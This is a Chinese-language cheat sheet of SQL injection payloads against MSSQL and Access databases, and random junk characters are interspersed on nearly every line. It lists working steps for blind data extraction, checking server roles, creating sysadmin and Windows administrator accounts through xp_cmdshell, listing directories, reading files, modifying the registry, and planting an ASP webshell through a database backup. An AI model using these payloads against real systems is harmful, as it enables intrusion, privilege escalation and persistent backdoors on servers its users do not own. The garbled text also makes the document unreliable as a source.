1.判断是否有注入;and 1=1 ;and 1=2 ~��i�4@sz&
2.初步判断是否是mssql ;and user>0 !p2&$s"N.�
�wP
i=+���
3.注入参数是字符'and [查询条件] and ''=' |(N�4x(�xl
+}n]A^&I\E
4.搜索时没过滤参数的'and [查询条件] and '%25'=' i�
F Ab"VA
5�`J.�
i�c
5.判断数据库系统 <t�Nx*ce5�
C-7�.S�a�
;and (select count(*) from sysobjects)>0 mssql `i�-&�Z��`
]iPdAwc�.1
;and (select count(*) from msysobjects)>0 access %r��sW:�nl
���]p�t� @
S@�_GjCpn�
?��@#<>7V
6.猜数据库 ;and (select Count(*) from [数据库名])>0 n�C w1H kW
%�K%z<�R�8
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 'D
�bHXS7N
V}*b^<2o�5
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 K;K�t�x>Z/
Hd:ZE::Q'#
9.(1)猜字段的ascii值(access) "6ZatRUd��
.d2��s�4q\
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 cg4,PI%�hz
A-�<�qr6q
(2)猜字段的ascii值(mssql) R�~b$7�jpd
:V
[v��E h
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 X��� qh�+�
_LK(j;6K}�
10.测试权限结构(mssql) C5m*pGI�mG
G100L}d"�N
�;�Wr$hDt^
5Z�Pl`[He�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- )wC>Hq[mhW
Y9C]�-zEv�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 3k�=q>~&�@
�X*b0q�J
Z
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- "3�7�1`�!%
&EMm�<(.]a
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- JS�4�pJe\q
|Q{�l�]D��
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- kmf4ax
�h1
8=$@��azG
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- eI@O�9�<.&
c;Li�~FLR
;and 1=(select IS_MEMBER('db_owner'));-- 5��d�)G3�0
�(Az^st/�_
K3jno+�U�&
=�I?p(�MqW
11.添加mssql和系统的帐户 tqH�XzmsjW
n�iFjsTA.Z
;exec master.dbo.sp_addlogin username;-- 0Y\u,\GrxW
;exec master.dbo.sp_password null,username,password;-- .w0�?����
��DQ,Q�y�V
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Y$�N�|p{Z
9:P�)@UF��
;exec master.dbo.xp_cmdshell 'net user username password �X�:D�Hz0S
GovGh? X#x
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �*e^��Z�H�
Dv$xP)./�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �.�EI/0�"^
J%n�J�O3,
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- X/@G�x� 4�
p�gI@[�zp7
sg3%n0Ms.W
NY_�Oo!)3�
12.(1)遍历目录 {�r� Gx*<e
�ohwQ%NDl
;create table dirs(paths varchar(100), id int) �w�^�r*qi"
��z�FOX%�q
;insert dirs exec master.dbo.xp_dirtree 'c:\' ?&?y-&.�5-
]^s4�N�Xf+
;and (select top 1 paths from dirs)>0 p����0-\G6
� X'0A�"�9
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) >~6
�;9�{@
<{'':/tXI�
BYu|lo�c�
e Q0bx&��
(2)遍历目录 ?L�_#A��dK
*�F�O�']�D
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ~Su>^�T(?-
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��$B�G9<:p
p�t��<84CP
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 g�|W~0A@D�
r8@:�Ko= a
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 {�D7!�'Rq,
pnf���3YuB
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 }=wS�fr9�g
�iXBc� ~�S
O^LzS&I�*
�'A��4L�r
13.mssql中的存储过程 q��+SDJ�?v
?L|@{RS�{|
xp_regenumvalues 注册表根键, 子键 �7^�S�&g.A
�H�>M0G��L
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 y�1P�?A�]v
~jJu*��s$?
xp_regread 根键,子键,键值名 :V`q;���g�
w^dB1Y7c(W
;exec xp_regread x�*(pr5k��
z�]tv��y).
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 64[�j:t=�N
IUw�Y/R�9Q
xp_regwrite 根键,子键, 值名, 值类型, 值 n`Cm��bM@@
D`Fl�*Wc4H
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 u U\UULH0
Q5baY\�"9^
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �pS5��1fF9
tk�~7���>S
xp_regdeletevalue 根键,子键,值名
ZQ@^(64��
TMGZHO�At�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Dj?9�5�Z,r
^��M8\ �3G
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Jzh_`j�W0l
�89~�)�nV)
�?�9/%K�45
0^zu� ��T
14.mssql的backup创建webshell VY�vH��psI
*S*;rLH9c�
use model %]�d�^B��|
��
8��DyE
create table cmd(str image); 0Y�W<>Y�`6
.{�~ygHQ`f
insert into cmd(str) values (''); �/S�Sl���$
H�z�28L��$
backup database model to disk='c:\l.asp'; ��Ut��Y<�R
H�!H�kXm"
tXwnK[�~x
J/=b1{d"�n
15.mssql内置函数 jwG�d*8�
/
Ws'�3*HAce
;and (select @@version)>0 获得Windows的版本号 i� �$#bg^�
9C�W .x�X8
;and user_name()='dbo' 判断当前系统的连接用户是不是sa .DI�Hd/wA�
�H2[�S]`?�
;and (select user_name())>0 爆当前系统的连接用户 =p� ^Sn�,t
�=f?|���f
;and (select db_name())>0 得到当前连接的数据库 �u:�<%!�?�
lfb]xu�]O�
%5��$yz|�:
8q}`4wC�D$
16.简洁的webshell <{�:�$�]�3
&� Z��*&�&
use model , En
D3�
|
{-�tCLkE
3
create table cmd(str image); �|G!-F�mIK
L~��CwL���
insert into cmd(str) values (''); |�Kh#\d���
e*�=N���\$
backup database model to disk='g:\wwwtest\l.asp';
